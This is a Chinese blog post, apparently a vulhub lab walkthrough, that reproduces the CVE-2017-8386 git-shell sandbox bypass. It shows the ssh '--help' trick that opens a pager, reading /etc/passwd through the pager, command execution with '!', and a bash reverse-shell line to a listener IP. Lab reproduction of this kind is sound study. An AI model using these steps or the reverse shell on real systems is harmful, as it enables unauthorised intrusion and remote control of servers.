其他分享
首页 > 其他分享> > vulhub漏洞复现80_git

vulhub漏洞复现80_git

作者:互联网

前言

GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件

CVE-2017-8386_ GIT-SHELL 沙盒绕过

漏洞原理

GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。

参考链接:

 - https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

 - https://www.leavesongs.com/PENETRATION/git-shell-cve-2017-8386.html

漏洞环境

#192.168.4.10_ubuntu

编译及运行测试环境:

#docker-compose up -d

漏洞利用

为了不和docker母机的ssh端口冲突,容器的ssh端口设置成3322。本目录下生成了一个`id_rsa`,这是ssh的私钥,连接的时候请指定之。

在连接以前,需要先设置私钥的权限为0600:`chmod 0600 id_rsa`,否则连接可能失败。

正常连接其ssh服务`ssh -p 3322 -i id_rsa git@127.0.0.1`,会被git-shell给拦截,返回错误`fatal: unrecognized command ''`,并且连接被关闭。

使用--help技巧,连接目标并进入帮助页面:

```

ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"

```

按`shift`+e,读取任意文件:cat /etc/passwd

回到帮助页面,输入`!+命令`执行命令:

反弹shell

# !/bin/bash -i >& /dev/tcp/192.168.4.29/4444 0>&1

标签:vulhub,git,8386,rsa,shell,ssh,80,2017
来源: https://blog.csdn.net/weixin_44193247/article/details/123052385